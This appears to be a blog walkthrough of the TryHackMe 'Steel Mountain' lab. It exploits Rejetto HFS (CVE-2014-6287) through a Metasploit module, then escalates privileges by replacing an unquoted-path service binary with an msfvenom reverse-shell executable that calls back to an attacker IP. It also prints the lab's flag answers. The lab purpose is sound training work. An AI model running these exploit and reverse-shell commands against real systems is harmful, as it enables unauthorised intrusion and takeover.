Steel Mountain TryHackMe writeup

Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.

Hello I’m Ayush Bagde aka Overide and Welcome Back to another writeup of TryHackMe machine which is “Steel Mountain”. So Let’s begin.

TASK 1: Introduction

In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

#1 Deploy the machine.

Who is the employee of the month?

Once you visit the IP address on port no. 80. That will give below picture and once you view the page source you will get the answer.

Answer: Bill Harper

TASK 2: Initial Access

Now you have deployed the machine, lets get an initial shell!

Let’s start with the basic thing which is nmap.

$sudo nmap -sV<ip>

As we can see that there are many ports open. We visited port no. 80 above and got above thing and then we saw the page source.

As we can see another port is open which is 8080 and running HttpFileServer httpd 2.3. Now let’s visit this port.

#1 Scan the machine with nmap. What is the other port running a web server on?

Answer: 8080

Click on the hyperlink of HttpFileServer 2.3 and let’s see what we get as an output.

#2. Take a look at the other web server. What file server is running?

Answer: rejetto http file server

Now just type in any browser rejetto http file server 2.3 exploit cve details.

And you’ll get this CVE-2014–6287 .

#3 What is the CVE number to exploit this file server?

Answer: CVE-2014–6287

As you can see in the screenshot it is written Metasploit. That’s means we have to now use metasploit console or msfconsole to exploit this machine.

Once you get into the console search for the CVE number.

use exploit/windows/http/rejetto_hfs_exec
set RHOST <machine IP>
set RPORT 8080
set LHOST <TryHackMe IP>
exploit

BOOM!!!

We got the shell but it is meterpreter shell we want to enter C drive. To get into it just type shell in it.

Let’s find the user.txt flag.

I found the flag in C:\Users\bill\Desktop.

#4 Use Metasploit to get an initial shell. What is the user flag?

Answer: b04763b6fcf51fcd7c13abc7db4fd365

TASK 3: Privilege Escalation

Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!

To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities — “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

Upload PowerUp.ps1 to target machine. To do that we have to go back again to meterpreter shell. Just type exit in that and you’ll be back at the meterpreter shell.

meterpreter > load powershell
meterpreter > powershell_shell

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks

#2 Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?

Answer: AdvancedSystemCareService9

Now use msfvenom to generate a reverse shell as an Windows executable.

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.8.116.182 LPORT=1234 -f exe -o ASCService.exe

Now we have to upload this ASCService.exe file with the legitimate one. Then restart the program to get a shell as root.

To go from PS to meterpreter press CTRL + C to stop the process. Then follow the below commands.

back to old session

meterpreter> shell
C:\ sc stop AdvancedSystemCareService9

Now we want to upload the exploit

upload ASCService.exe “\Program Files (x86)\IObit\Advanced\SystemCare\ASCService.exe”

Back to shell and start malicious service

sc start AdvancedSystemCareService9

Now we got the shell. Let’s find the root flag. Go to c:/users/administrator/desktop and you’ll find the root flag.

#4 What is the root flag?

Answer: 9af5f314f57607c00fd09803a587db80

TASK 4: Access and Escalation Without Metasploit

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to

To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

#1 To begin we shall be using the same CVE. However, this time let’s use this exploit.

#2 What powershell -c command could we run to manually find out the service name?

Answer: powershell -c “Get-Service”

Try to do it on your own. We’ve owned another machine. Congratulations !!!

Connect to me on:

LinkedIn: https://www.linkedin.com/in/ayush-bagde-49660219a/

TryHackMe: https://tryhackme.com/p/Overide

Discord: https://discord.gg/5FzevEjqGj

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store